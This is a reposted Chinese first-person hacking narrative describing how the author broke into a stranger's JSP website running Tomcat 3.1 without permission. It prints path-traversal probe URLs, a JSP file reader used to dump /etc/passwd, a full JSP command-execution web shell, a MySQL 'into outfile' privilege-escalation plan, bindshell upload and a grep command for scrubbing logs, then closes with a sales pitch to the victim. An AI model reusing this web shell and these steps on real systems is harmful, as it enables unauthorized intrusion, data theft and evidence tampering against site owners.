現場紀實—如何入侵基於JSP的網站

來源:互聯網
上載者:User
很偶然的一個機會,瀏覽到一個網站,頁面清新讓人感覺很舒服。網站是用JSP開發的,出於個人愛好,我決定測試一下其系統的安全性。
  
  telnet www.target.com 8080
  GET /CHINANSL HTTP/1.1
  [Enter]
  [Enter]
  
  
    返回的結果如下:
  
  HTTP/1.0 404 Not Found
  Date: Sun, 08 Jul 2001 07:49:13 GMT
  Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
  .2.12 i386; java.vendor=Blackdown Java-Linux Team)
  Content-Language: en
  Content-Type: text/html
  Status: 404
  
  〈h1〉Error: 404〈/h1〉
  〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL
  
  
    獲得了啟動並執行WEBServer的名稱“Tomcat 3.1”。記得曾經發現過這個版本的漏洞,並且post到bugtrap上去過。
  
    回憶一下,大概是通過“..”技術可以退出WEB目錄,於是:
  
  http://target:8080/../../../../%00.jsp (不行)
  http://target:8080/file/index.jsp (不行)
  http://target:8080/index.JSP (不行)
  http://target:8080/index.jsp%81 (不行)
  http://target:8080/index.js%70 (不行)
  http://target:8080/index.jsp%2581 (不行)
  http://target:8080/WEB-INF/ (不行)
  
  
    看來安全狀況似乎還不錯,我們再來進行一下更深層的測試。Tomcat 3.1內建了一個管理工具,可以查看WEB下的目錄及檔案,並且可以添加context。於是嘗試:
  
  http://target:8080/admin/
  
  
    管理員果然沒有刪除或禁止訪問這個目錄,從安全的角度說,這點應該算是一個比較重要的失誤。
  
    接著,點擊“VIEW ALL CONTEXT”按鈕,列出了WEB目錄下的一些檔案和目錄的名稱,很快發現了一個上傳檔案的組件,通過這個組件將一個JSP檔案上傳到對方的WEB目錄裡:
  
  〈%@ page import="java.io.*" %〉
  〈%
  String file = request.getParameter("file");
  String str = "";
  FileInputStream fis = null;
  DataInputStream dis = null;
  try{
  fis = new FileInputStream(file);
  dis = new DataInputStream(fis);
  while(true){
  try{
  str = dis.readLine();
  }catch(Exception e){}
  if(str == null)break;
  out.print(str+"〈br〉");
  }
  }catch(IOException e){}
  %〉
  
  
    然後執行:
  
  http://target:8080/upload/test.jsp?file=/etc/passwd
  
  
  
    密碼出來了。接下來的過程是猜測密碼,沒有成功。不過,現在相當於有了一個SHELL,猜不出密碼可以先把IE當作SHELL環境。
    再寫一個JSP檔案:
  
  〈%@ page import="java.io.*" %〉
  〈%
  try {
  String cmd = request.getParameter("cmd");
  Process child = Runtime.getRuntime().exec(cmd);
  InputStream in = child.getInputStream();
  int c;
  while ((c = in.read()) != -1) {
  out.print((char)c);
  }
  in.close();
  try {
  child.waitFor();
  } catch (InterruptedException e) {
  e.printStackTrace();
  }
  } catch (IOException e) {
  System.err.println(e);
  }
  %〉
  
  
    然後把這個JSP再通過upload上傳,有SHELL了。
  
  http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
  (詳細結果這裡就不列出來了)
  
  
    怎麼獲得root許可權呢?經過一番搜尋發現系統安裝了MySQL,並且從JSP的原始碼中得到了MySQL的密碼,執行:
  
  sqld"〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
  
  
    顯示:
  
  root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
  
  
    系統是以root身份啟動並執行MySQL。這時我思考了一下,既然知道了MySQL的密碼,那就可以寫一個SHELL程式,讓它建立一個表,然後將我的資料放到表中,再使用“select ... into outfile;”的辦法在系統上建立一個檔案,讓使用者在執行su的時候,運行我的程式。(還記得apache.org有一次被入侵嗎?駭客就採用的這種辦法)。
  
    之後就比較簡單了,上傳bindshell之類的程式,運行、獲得nobody的許可權,使用su root時幫忙建立的setuid shell讓自己成為root。
  
    但是,接下來已經實際操作,結果令人頗感意外:
  
  http://target:8080/upload/cmd.jsp?cmd=id
  
  
    顯示:
  
  uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
  
  
    原來這個WEB SHELL本來就是ROOT!管理員的安全設定工作到底怎麼做的?
  
  http://target:8080/upload/cmd.jsp?cmd=ps+aux
  果然是root身份啟動並執行(不列出來了)
  
  
    剩下的事情:
  
    1、刪除我的telnet記錄。
  
    2、刪除http的日誌。
  
    清除日誌我使用的辦法是:cat xxx |grep -V "IP" 〉〉temp然後在把temp覆蓋那些被我修改過的記錄檔。
  
    說明一點,我沒有更換該網站的頁面,因為我只是個網路安全愛好者。所以,發封郵件告訴system admin吧!當然,我順便在信中提到,如果需要安盟資訊科技為他提供安全服務的話,我們會非常的高興! 
 
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.